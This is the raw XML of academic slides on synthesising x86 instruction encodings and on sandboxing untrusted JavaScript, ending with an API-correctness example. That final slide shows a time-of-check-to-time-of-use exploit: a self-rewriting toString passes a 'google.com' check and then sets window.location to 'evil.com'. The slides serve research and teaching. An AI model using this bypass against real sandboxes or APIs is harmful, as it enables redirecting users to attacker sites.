              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>Techniques:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Test generation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tools:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SAGE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, PEX,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609600" y="2070080"/>
            <a:ext cx="3124200" cy="29718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Courrier"/>
              <a:cs typeface="Cour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14628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l1:mov		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>, inp1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mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>cl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>,  inp2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shl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>eax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cl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jnz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>		l2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jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> 	l3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>l2: div 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ebx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eax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// Is this safe ?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// Is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eax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!= 0 ?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l3: …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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier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6" name="Picture 5" descr="Intel-718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6400"/>
            <a:ext cx="2623457" cy="2257813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:scene3d>
            <a:camera prst="orthographicFront">
              <a:rot lat="600000" lon="2400000" rev="1200000"/>
            </a:camera>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Arrow Connector 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4114005" y="1599407"/>
            <a:ext cx="457201" cy="1588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2209800"/>
            <a:ext cx="990602" cy="1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3200400"/>
            <a:ext cx="990602" cy="1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05400" y="3200400"/>
            <a:ext cx="990602" cy="1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5398" y="2209800"/>
            <a:ext cx="990602" cy="1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704306" y="2704306"/>
            <a:ext cx="381000" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
            <a:prstDash val="sys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441672" y="2633940"/>
            <a:ext cx="392668" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
            <a:prstDash val="sys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3800" y="990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Instruction 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190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Inp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28956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Inp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" baseline="-25000" dirty="0" err="1" smtClean="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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1981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0" y="2983468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Op</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" baseline="-25000" dirty="0" err="1" smtClean="0"/>
              <a:t>m</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3472543" y="1752600"/>
            <a:ext cx="1785257" cy="1905000"/>
            <a:chOff x="3548743" y="1219200"/>
            <a:chExt cx="2547257" cy="2065564"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Rectangle 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3548743" y="1219200"/>
              <a:ext cx="2547257" cy="206556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83641" y="1488619"/>
              <a:ext cx="1420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?</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="6000" dirty="0"/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228600" y="4114800"/>
            <a:ext cx="8839200" cy="1066800"/>
            <a:chOff x="228600" y="4114800"/>
            <a:chExt cx="8839200" cy="1066800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rounded Rectangle 35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="228600" y="4114800"/>
              <a:ext cx="8763000" cy="1066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4800" y="4191000"/>
              <a:ext cx="876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Problem:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                <a:t> Given a processor and an instruction name, symbolically describe the input-output relation corresponding to the instruction</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2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2400" y="5410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Font typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Express the encodings as bit-vector constraints (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>: SMT-Lib format)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-274320"/>
            <a:endParaRPr lang="en-US" sz="2400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304800" y="1219200"/>
            <a:ext cx="1905000" cy="407313"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 39834"/>
              <a:gd name="adj2" fmla="val 14980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Bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vector[X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6477000" y="1219200"/>
            <a:ext cx="1905000" cy="407313"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -50166"/>
              <a:gd name="adj2" fmla="val 16851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Bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vector[Y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39" grpId="0" animBg="1"/>
      <p:bldP spid="39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+ Result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" y="2552700"/>
            <a:ext cx="15621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Sample inputs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(C with in-lined assembly)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Intel-718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04900"/>
            <a:ext cx="1752600" cy="1064061"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="0"/>
            </a:schemeClr>
          </a:solidFill>
          <a:scene3d>
            <a:camera prst="orthographicFront">
              <a:rot lat="600000" lon="2400000" rev="1200000"/>
            </a:camera>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="935325" y="2267238"/>
            <a:ext cx="416940" cy="1589"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2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2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3200400" y="2400300"/>
            <a:ext cx="1752600" cy="1219200"/>
            <a:chOff x="2209800" y="2438400"/>
            <a:chExt cx="1676400" cy="1219200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Decision 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2209800" y="2438400"/>
              <a:ext cx="1603513" cy="1219200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2743200"/>
              <a:ext cx="1676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Synthesis</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                <a:t>engine</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Document 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="2247900"/>
            <a:ext cx="1143000" cy="645538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Partial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Truth-table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3009900"/>
            <a:ext cx="1447800" cy="1547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67600" y="3009900"/>
            <a:ext cx="685800" cy="1588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200400" y="1104900"/>
            <a:ext cx="2819400" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -19546"/>
              <a:gd name="adj2" fmla="val 13287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Searches for a function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1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 that respects truth table</a:t>
            </a:r>
          </a:p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6019800" y="2400300"/>
            <a:ext cx="1752600" cy="1219200"/>
            <a:chOff x="2209800" y="2438400"/>
            <a:chExt cx="1676400" cy="1219200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Decision 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2209800" y="2438400"/>
              <a:ext cx="1676400" cy="1219200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2743200"/>
              <a:ext cx="1676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Validation</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>engine</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" dirty="0" smtClean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4876800" y="3009900"/>
            <a:ext cx="1143000" cy="18366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24800" y="25921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Validated formula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76800" y="2400300"/>
            <a:ext cx="9906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Formula </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1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endParaRPr lang="en-US" sz="1600" i="1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3" name="Freeform 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4038600" y="3619500"/>
            <a:ext cx="2895600" cy="342900"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1968500"/>
              <a:gd name="connsiteY0" fmla="*/ 622300 h 622300"/>
              <a:gd name="connsiteX1" fmla="*/ 1016000 w 1968500"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 622300"/>
              <a:gd name="connsiteX2" fmla="*/ 1968500 w 1968500"/>
              <a:gd name="connsiteY2" fmla="*/ 622300 h 622300"/>
              <a:gd name="connsiteX3" fmla="*/ 1968500 w 1968500"/>
              <a:gd name="connsiteY3" fmla="*/ 622300 h 622300"/>
              <a:gd name="connsiteX4" fmla="*/ 1955800 w 1968500"/>
              <a:gd name="connsiteY4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0" h="622300">
                <a:moveTo>
                  <a:pt x="0" y="622300"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="343958" y="311150"/>
                  <a:pt x="687917" y="0"/>
                  <a:pt x="1016000" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1344083" y="0"/>
                  <a:pt x="1968500" y="622300"/>
                  <a:pt x="1968500" y="622300"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1968500" y="622300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955800" y="622300"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln cap="flat">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/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8600" y="5257800"/>
            <a:ext cx="87249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Reference:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Automated Synthesis of Symbolic Instruction Encodings from I/O Samples </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[PLDI’12]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411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Result: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automatically synthesized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>512 encodings (outputs, EFLAGS, 8, 16, 32bits)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> for all the ALU instructions from the X86 architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Oval Callout 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6934200" y="1600200"/>
            <a:ext cx="1219200" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -55492"/>
              <a:gd name="adj2" fmla="val 7818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Tricky!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5" grpId="0"/>
      <p:bldP spid="39" grpId="0" animBg="1"/>
      <p:bldP spid="43" grpId="0" animBg="1"/>
      <p:bldP spid="45" grpId="0" animBg="1"/>
      <p:bldP spid="46" grpId="0"/>
      <p:bldP spid="4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77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147981"/>
            <a:ext cx="1828800" cy="2246531"/>
            <a:chOff x="228600" y="1295400"/>
            <a:chExt cx="1828800" cy="2246531"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5" descr="mitchell-10-smal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295400"/>
              <a:ext cx="1220619" cy="15684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600" y="28956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John C. Mitchell</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>(Stanford)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98350" y="1147981"/>
            <a:ext cx="2602250" cy="2170331"/>
            <a:chOff x="2198350" y="1295400"/>
            <a:chExt cx="2602250" cy="2170331"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Picture 12" descr="sergio-pho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200" y="1295400"/>
              <a:ext cx="1885950" cy="1524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98350" y="2819400"/>
              <a:ext cx="2602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Sergio </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>Maffeis</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>(Imperial College London)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98050" y="3394512"/>
            <a:ext cx="1893550" cy="2320488"/>
            <a:chOff x="4964450" y="1145243"/>
            <a:chExt cx="1893550" cy="2320488"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Picture 11" descr="jasvi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6200" y="1145243"/>
              <a:ext cx="1380520" cy="16741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64450" y="28194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Jasvir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>Nagra</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>(Google)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3429000"/>
            <a:ext cx="1893550" cy="2286000"/>
            <a:chOff x="7162800" y="1179731"/>
            <a:chExt cx="1893550" cy="2286000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 10" descr="mark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3283" y="1179731"/>
              <a:ext cx="1379717" cy="16396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162800" y="28194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Mark S. Miller</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>(Google)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07684" y="1147981"/>
            <a:ext cx="2083916" cy="2214781"/>
            <a:chOff x="0" y="3613150"/>
            <a:chExt cx="1893550" cy="2214781"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 7" descr="sumi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613150"/>
              <a:ext cx="1296819" cy="15684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0" y="51816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Sumit</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>Gulwani</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>(MSR Redmond)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3500219"/>
            <a:ext cx="1893550" cy="2214781"/>
            <a:chOff x="2221250" y="3613150"/>
            <a:chExt cx="1893550" cy="2214781"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6" descr="ashish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8400" y="3613150"/>
              <a:ext cx="1447800" cy="15684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21250" y="51816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Ashish</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>Tiwari</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>(SRI International)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76800" y="1143000"/>
            <a:ext cx="1893550" cy="2214781"/>
            <a:chOff x="4876800" y="3613150"/>
            <a:chExt cx="1893550" cy="2214781"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="21" name="Picture 20" descr="PatriceGodefroid-pic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4134" y="3613150"/>
              <a:ext cx="1691466" cy="15684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876800" y="51816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Patrice </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>Godefroid</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>(MSR Redmond)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02250" y="3500219"/>
            <a:ext cx="1893550" cy="2214781"/>
            <a:chOff x="7162800" y="3613150"/>
            <a:chExt cx="1893550" cy="2214781"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Picture 9" descr="ulfa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3283" y="3613150"/>
              <a:ext cx="1379717" cy="16002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162800" y="5181600"/>
              <a:ext cx="1893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Ulfar</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>Erlingsson</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>(Google)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04800" y="5715000"/>
            <a:ext cx="8610600" cy="5207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Thank You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0866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Ankur Taly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4160" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stanford University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Joint work with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Sergio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Maffeis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, John C. Mitchell, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Úlfar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Erlingsson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Mark S. Miller and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jasvir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Nagra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fld id="{60403989-3EFF-4C4D-9A9D-F370A7D41FF0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1524000"/>
            <a:ext cx="7772400" cy="15240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Sandboxing Untrusted JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400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356350"/>
            <a:ext cx="2590800" cy="5016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Ankur Taly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105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fld id="{60403989-3EFF-4C4D-9A9D-F370A7D41FF0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2438400"/>
            <a:ext cx="8458200" cy="15240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Problems for Future Research</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400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356350"/>
            <a:ext cx="2590800" cy="5016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Ankur Taly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686800" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hosting Page Isolation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Inter-component Isolation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mediated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762000"/>
            <a:ext cx="8610600" cy="15240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Three Security Policies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Correctness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267201" y="1524000"/>
            <a:ext cx="4495799" cy="2057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API correctness</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: verify that all possible invocations of the API by sandboxed code, preserve an invariant on the (confined) security-critical resources</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="laptop"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="76200" y="1143000"/>
            <a:ext cx="4038600" cy="304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44296" y="1371600"/>
            <a:ext cx="2575706" cy="1291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3294" y="2638730"/>
            <a:ext cx="2575706" cy="405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Protected resources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10202" y="2210971"/>
            <a:ext cx="1966358" cy="3798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API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0202" y="1752600"/>
            <a:ext cx="1971798" cy="458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Sandboxed code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200" y="1123890"/>
            <a:ext cx="8991600" cy="1924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function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check(x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){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         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if(x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== “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google.com”){return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true}};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api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{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setLoc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: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function(x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){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					      if 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check(x)){window.location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}};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			 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Correctness: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119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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>window.location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/>
              <a:t>always get set to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>google.com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576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NO! TOCTTOU bug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" y="4114800"/>
            <a:ext cx="8991600" cy="2032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o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= {};</a:t>
            </a:r>
          </a:p>
          <a:p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o.toString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= function(){</a:t>
            </a:r>
          </a:p>
          <a:p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					 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this.toString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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>function(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>                                   return “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>”};</a:t>
            </a:r>
          </a:p>
          <a:p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				    return “</a:t>
            </a:r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google.com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”}});</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>api.setLoc(o</a:t>
            </a:r>
